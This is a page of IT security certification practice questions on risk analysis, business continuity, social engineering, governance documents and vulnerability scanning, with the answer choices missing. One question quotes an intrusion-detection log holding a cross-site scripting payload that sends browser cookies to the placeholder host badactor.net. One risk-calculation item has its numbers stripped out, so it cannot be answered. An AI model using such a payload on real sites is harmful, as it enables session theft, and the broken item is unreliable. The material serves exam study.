All practice questions
2232 questions
A software technology vendor has established a formal Information Security Management System (ISMS) to safeguard its cloud services. To satisfy international enterprise clients requiring proof of security compliance and receive an officially recognized certificate, the vendor must undergo an independent third-party evaluation. Which of the following activities should the vendor initiate?
Match each vulnerability scanning methodology with its corresponding operational description and primary enterprise use case.
Click a left item, then click its matching right item
Items
Matches
An enterprise system administrator receives an unsolicited telephone call from an individual claiming to represent the organization's central data center team. The caller states that an emergency database synchronization failure is occurring and demands that the administrator immediately provide their two-factor authentication bypass code to prevent widespread data loss. Which social engineering attack vector is the caller primarily utilizing?
A hospital network completes a Business Impact Analysis (BIA) for its critical electronic health records (EHR) database. The BIA determines that patient care workflows can tolerate a maximum system outage of 4 hours before safety is severely compromised. However, to prevent clinical record corruption and medication errors, the hospital can sustain a maximum of 15 minutes of unrecoverable transactional data loss. When configuring the disaster recovery architecture, which threshold specifically dictates the required database backup/replication frequency, and what is its correct definition?
A Security Operations Center (SOC) analyst receives a high-severity intrusion detection alert indicating an unusual volume of outbound DNS queries containing randomized long subdomains. Arrange the following security operations steps in the correct chronological sequence from initial alert triage to network-wide remediation.
Drag items to arrange them in the correct order
A multinational retail company is standardizing the operational security of its point-of-sale (POS) systems across hundreds of physical store locations. The security committee requires a document that establishes the mandatory minimum technical security settings, such as disabling legacy protocols and enforcing specific firewall port rules, that every POS device must continuously meet. Which of the following governance document types best satisfies this requirement?
A security administrator is updating the enterprise baseline controls for data protection across various infrastructure layers. Match each cryptographic mechanism on the left with its primary operational security function on the right.
Click a left item, then click its matching right item
Items
Matches
During a routine security audit, an incident handler observes that several software developers in a research division were redirected to a compromised third-party technical discussion forum they frequently visit. The compromised forum silently downloaded a malicious browser extension to harvest API tokens used in the company's continuous integration pipeline. Which of the following social engineering techniques best describes this initial access vector?
An enterprise risk assessment identifies that an internal enterprise resource planning (ERP) database has an Asset Value () of . Historical security data indicates an Annual Rate of Occurrence () of for unauthorized data extraction threats targeting this database. The overall calculated Annual Loss Expectancy () for this vulnerability is . Which of the following represents the Exposure Factor () for this asset under the given threat scenario?
A security analyst conducts a scheduled credentialed vulnerability scan against a cluster of Windows servers. Although the scan completes without generating network connectivity errors, the resulting report indicates zero missing operating system patches, despite known unpatched software being present on the servers. A review of the scanner audit logs shows that initial SMB authentication succeeded, but subsequent administrative probes failed when accessing remote management interfaces. Which of the following best explains why the vulnerability scanner produced incomplete results?
An enterprise risk manager is conducting a gap analysis across global business units to establish baseline legal and contractual compliance controls. Match each regulatory or industry framework to its primary operational scope and data protection mandate.
Click a left item, then click its matching right item
Items
Matches
An IT administrator is deploying multiple internal web applications under subdomains of an enterprise domain (such as `hr.corp.example.com` and `finance.corp.example.com`). To simplify administrative overhead and ensure all current and future first-level subdomains are secured under a single TLS certificate issued by the internal Certificate Authority, which of the following certificate features should be specified during the Certificate Signing Request (CSR) process?
Match each enterprise data governance role on the left with its primary responsibility on the right.
Click a left item, then click its matching right item
Items
Matches
Match each vulnerability assessment methodology with its most appropriate enterprise operational deployment scenario.
Click a left item, then click its matching right item
Items
Matches
An organization plans to establish a direct network link with a key business partner to facilitate automated data synchronization. Before enabling the connection, the security team must document the specific technical security controls, interface configurations, and encryption standards governing the direct link. Which of the following agreements should be established to define these technical parameters?
A security analyst is investigating a high-severity alert generated by a Network Intrusion Detection System (NIDS) positioned at an internal network segment boundary. The NIDS alert log records the following HTTP request event:
2026-07-27T10:14:22Z NIDS_ALERT [ID: 8042911]
SRC: 192.168.10.44:51204 -> DST: 10.1.20.15:80
PROTO: TCP HTTP/1.1
PAYLOAD: GET /profile.php?user=<script>document.location='http://badactor.net/collect.php?cookie='+document.cookie</script> HTTP/1.1
HOST: app-server01.internal.corp
USER-AGENT: Mozilla/5.0
Based on the log entry, which of the following correctly identifies the specific attack threat vector and the most effective inline network control to prevent subsequent payload execution?
A healthcare organization is preparing to contract with a third-party Cloud Service Provider (CSP) to host electronic protected health information. During the vendor onboarding security review, the organization must establish ongoing oversight and technical verification of the provider's security controls across the contract lifecycle. Which of the following strategies should the organization enforce to validate third-party security posture and maintain supply chain governance? (Select TWO.)
Select all that apply
An enterprise energy grid operator is restructuring its security governance documentation hierarchy. Match each governance document type on the left with its corresponding operational and enforcement characteristic on the right.
Click a left item, then click its matching right item
Items
Matches
Match each social engineering attack vector to its corresponding real-world enterprise incident scenario.
Click a left item, then click its matching right item
Items
Matches
An enterprise cloud security architect is defining business continuity parameters for a mission-critical billing microservice following a Business Impact Analysis (BIA). Match each continuity metric on the left with its precise operational boundary definition on the right.
Click a left item, then click its matching right item
Items
Matches